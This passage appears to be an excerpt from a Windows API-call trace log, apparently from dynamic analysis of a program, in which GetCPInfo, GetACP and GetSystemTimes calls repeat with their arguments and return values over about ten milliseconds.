lpCPInfo=0x18fa10) returned 1 [0113.841] GetACP () returned 0x4e4 [0113.841] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.842] GetACP () returned 0x4e4 [0113.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.842] GetACP () returned 0x4e4 [0113.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.842] GetACP () returned 0x4e4 [0113.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.842] GetACP () returned 0x4e4 [0113.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.842] GetACP () returned 0x4e4 [0113.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.842] GetACP () returned 0x4e4 [0113.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.842] GetACP () returned 0x4e4 [0113.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.842] GetACP () returned 0x4e4 [0113.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.843] GetACP () returned 0x4e4 [0113.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.843] GetACP () returned 0x4e4 [0113.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.843] GetACP () returned 0x4e4 [0113.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.843] GetACP () returned 0x4e4 [0113.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.843] GetACP () returned 0x4e4 [0113.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.843] GetACP () returned 0x4e4 [0113.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.843] GetACP () returned 0x4e4 [0113.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.843] GetACP () returned 0x4e4 [0113.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.844] GetACP () returned 0x4e4 [0113.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.844] GetACP () returned 0x4e4 [0113.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.844] GetACP () returned 0x4e4 [0113.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.844] GetACP () returned 0x4e4 [0113.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.844] GetACP () returned 0x4e4 [0113.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.844] GetACP () returned 0x4e4 [0113.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.844] GetACP () returned 0x4e4 [0113.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.844] GetACP () returned 0x4e4 [0113.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.845] GetACP () returned 0x4e4 [0113.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.845] GetACP () returned 0x4e4 [0113.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.845] GetACP () returned 0x4e4 [0113.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.845] GetACP () returned 0x4e4 [0113.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.845] GetACP () returned 0x4e4 [0113.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.845] GetACP () returned 0x4e4 [0113.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.845] GetACP () returned 0x4e4 [0113.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.845] GetACP () returned 0x4e4 [0113.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.845] GetACP () returned 0x4e4 [0113.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.846] GetACP () returned 0x4e4 [0113.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.846] GetACP () returned 0x4e4 [0113.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.846] GetACP () returned 0x4e4 [0113.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.846] GetACP () returned 0x4e4 [0113.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.846] GetACP () returned 0x4e4 [0113.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.846] GetACP () returned 0x4e4 [0113.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.846] GetACP () returned 0x4e4 [0113.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.846] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.846] GetACP () returned 0x4e4 [0113.846] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.847] GetACP () returned 0x4e4 [0113.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.847] GetACP () returned 0x4e4 [0113.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.847] GetACP () returned 0x4e4 [0113.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.847] GetACP () returned 0x4e4 [0113.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.847] GetACP () returned 0x4e4 [0113.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.847] GetACP () returned 0x4e4 [0113.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.847] GetACP () returned 0x4e4 [0113.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.847] GetACP () returned 0x4e4 [0113.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.847] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.847] GetACP () returned 0x4e4 [0113.847] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.848] GetACP () returned 0x4e4 [0113.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.848] GetACP () returned 0x4e4 [0113.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.848] GetACP () returned 0x4e4 [0113.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.848] GetACP () returned 0x4e4 [0113.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.848] GetACP () returned 0x4e4 [0113.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.848] GetACP () returned 0x4e4 [0113.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.848] GetACP () returned 0x4e4 [0113.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.848] GetACP () returned 0x4e4 [0113.848] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.848] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.848] GetACP () returned 0x4e4 [0113.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.849] GetACP () returned 0x4e4 [0113.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.849] GetACP () returned 0x4e4 [0113.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.849] GetACP () returned 0x4e4 [0113.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.849] GetACP () returned 0x4e4 [0113.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.849] GetACP () returned 0x4e4 [0113.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.849] GetACP () returned 0x4e4 [0113.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.849] GetACP () returned 0x4e4 [0113.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.849] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.849] GetACP () returned 0x4e4 [0113.849] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.850] GetACP () returned 0x4e4 [0113.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.850] GetACP () returned 0x4e4 [0113.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.850] GetACP () returned 0x4e4 [0113.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.850] GetACP () returned 0x4e4 [0113.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.850] GetACP () returned 0x4e4 [0113.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.850] GetACP () returned 0x4e4 [0113.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.850] GetACP () returned 0x4e4 [0113.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.850] GetACP () returned 0x4e4 [0113.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.851] GetACP () returned 0x4e4 [0113.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | 